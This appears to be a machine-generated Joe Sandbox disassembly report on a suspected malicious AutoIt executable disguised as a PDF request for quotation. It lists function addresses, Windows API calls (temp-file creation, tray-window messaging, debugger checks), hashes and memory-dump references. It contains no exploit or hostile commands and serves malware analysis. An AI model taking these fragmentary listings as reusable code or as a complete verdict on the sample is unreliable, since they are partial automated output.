                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                • Opcode ID: 987abe70a503b2008032ccb10465db250f7f07bdaec65f4ea14ff2caebabbf40
                                                                                                                • Instruction ID: 085a0c18ee2cbf9615b4ee5bcb4b3ad6157d7509757c9eb2fdd0a4c3897ecf57
                                                                                                                • Opcode Fuzzy Hash: 987abe70a503b2008032ccb10465db250f7f07bdaec65f4ea14ff2caebabbf40
                                                                                                                • Instruction Fuzzy Hash: 93F0C875B412187ADB14FBA4CE92FFF77B8AB43350F040915B822632C2DB60991C86A1
                                                                                                                Function 00AC747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen
                                                                                                                • String ID: 3, 3, 16, 1
                                                                                                                • API String ID: 176396367-3042988571
                                                                                                                • Opcode ID: 18e92c73fdff428b4a702b2df5b090c0e9361e9d5be1d6a3609a7c8c650a2249
                                                                                                                • Instruction ID: d889d8976f8454d616d5b6e5f00ae202dce7cdc48c8b340e8643cdecd75ae3d9
                                                                                                                • Opcode Fuzzy Hash: 18e92c73fdff428b4a702b2df5b090c0e9361e9d5be1d6a3609a7c8c650a2249
                                                                                                                • Instruction Fuzzy Hash: 71E02B0365462010A23513799FC1F7F569ADFC9750711182FF981C2266EA948D9293A0
                                                                                                                Function 00AA0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AA0B23
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 2030045667-4017498283
                                                                                                                • Opcode ID: 967a99d7508e4be21882f87468eb6b067dbea69fb2edabc424acbe6fa8b5a947
                                                                                                                • Instruction ID: 4e225c76862674507c45959a9fbde9f33a4afae8cd4cba5f74de8feedfb44e4a
                                                                                                                • Opcode Fuzzy Hash: 967a99d7508e4be21882f87468eb6b067dbea69fb2edabc424acbe6fa8b5a947
                                                                                                                • Instruction Fuzzy Hash: 82E0D8322443093AD2143794BD03FC97B949F05B21F50042BFB49955C38AF2245086A9
                                                                                                                Function 00A60D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A5F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A60D71,?,?,?,00A4100A), ref: 00A5F7CE
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,00A4100A), ref: 00A60D75
                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A4100A), ref: 00A60D84
                                                                                                                Strings
                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A60D7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                • API String ID: 55579361-631824599
                                                                                                                • Opcode ID: d59d613370d5c8457ce9add062f8f9e4df41224a04850a589d324f965d18777b
                                                                                                                • Instruction ID: 8b1b0d7e2a87d397c3787bc3d0d725ccbdf038ac22f75f7854dd4ce8e62e3b06
                                                                                                                • Opcode Fuzzy Hash: d59d613370d5c8457ce9add062f8f9e4df41224a04850a589d324f965d18777b
                                                                                                                • Instruction Fuzzy Hash: F6E039742003018FD320AFA8E504A837BE4AB04745F048A2EE883C6655EBB0E4848B91
                                                                                                                Function 00AB3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00AB302F
                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AB3044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                • String ID: aut
                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                • Opcode ID: 17c3835c6f647b389651f12210f0e7e7ff3ba3967374278d580b1ca30e388667
                                                                                                                • Instruction ID: bd1c1d7cf90c682cabd144f87d31a59c8e940be0e8abd94776361b175d3580a4
                                                                                                                • Opcode Fuzzy Hash: 17c3835c6f647b389651f12210f0e7e7ff3ba3967374278d580b1ca30e388667
                                                                                                                • Instruction Fuzzy Hash: 16D05B7150131467DA20F7D49C0DFC73B6CD704760F400292B656D20D1DAB09545CAD0
                                                                                                                Function 00A9D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime
                                                                                                                • String ID: %.3d$X64
                                                                                                                • API String ID: 481472006-1077770165
                                                                                                                • Opcode ID: c9b6845c2f2748e890cc6ba5bfb9f76e1d0a34a9e6369af112213a90404f49d9
                                                                                                                • Instruction ID: d6fff4549a9b78fb66feb26967738d62fbaeb0ca59b394f7150d06f0ca0312f8
                                                                                                                • Opcode Fuzzy Hash: c9b6845c2f2748e890cc6ba5bfb9f76e1d0a34a9e6369af112213a90404f49d9
                                                                                                                • Instruction Fuzzy Hash: 99D062B5D49119E9CF5097D0DD459F9B7FCFB18341F908452FD0791080D634D589A761
                                                                                                                Function 00AD2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AD232C
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AD233F
                                                                                                                  • Part of subcall function 00AAE97B: Sleep.KERNEL32 ref: 00AAE9F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 0d8a7fedcb16878b1c595ad6812b4785592ebe53caed075386269a6c7ea0282a
                                                                                                                • Instruction ID: 8bba659904c05f1c29d7b95bc9577ec58278f8171f711fcaeae8e2d06220bc3c
                                                                                                                • Opcode Fuzzy Hash: 0d8a7fedcb16878b1c595ad6812b4785592ebe53caed075386269a6c7ea0282a
                                                                                                                • Instruction Fuzzy Hash: CAD0C936395311B6EA64E7B0AC0FFC6BB58AB00B20F4049167646AA1E0CAA4A802CA54
                                                                                                                Function 00AD2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AD236C
                                                                                                                • PostMessageW.USER32(00000000), ref: 00AD2373
                                                                                                                  • Part of subcall function 00AAE97B: Sleep.KERNEL32 ref: 00AAE9F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: e06edca5fb4c802bc52f6f5205c3eb5ca17f10cc2fd23aeac901204f3733b4a3
                                                                                                                • Instruction ID: 18b8be5444dd027b3d1b6ce121b962d6464cb5a52225f55a18aa8c281118fd41
                                                                                                                • Opcode Fuzzy Hash: e06edca5fb4c802bc52f6f5205c3eb5ca17f10cc2fd23aeac901204f3733b4a3
                                                                                                                • Instruction Fuzzy Hash: B4D0C7353C131176E564E7709C0FFC677545705710F4045167646961D0C9A4A801C654
                                                                                                                Function 00A7BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A7BE93
                                                                                                                • GetLastError.KERNEL32 ref: 00A7BEA1
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A7BEFC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1717984340-0
                                                                                                                • Opcode ID: f08ae56dc9760cae32be0af9009a3be6126caf75accc160745d9d78b999898e6
                                                                                                                • Instruction ID: 8b26896767c9c1867b76397a1d5d5f5fe0aa9e983088aa3e97f5e47ab559d42e
                                                                                                                • Opcode Fuzzy Hash: f08ae56dc9760cae32be0af9009a3be6126caf75accc160745d9d78b999898e6
                                                                                                                • Instruction Fuzzy Hash: 5641C4B4611216AFDB21CFA4CD54BAABBB5AF41B20F14C169F95D9B2A1DB30CD01CB70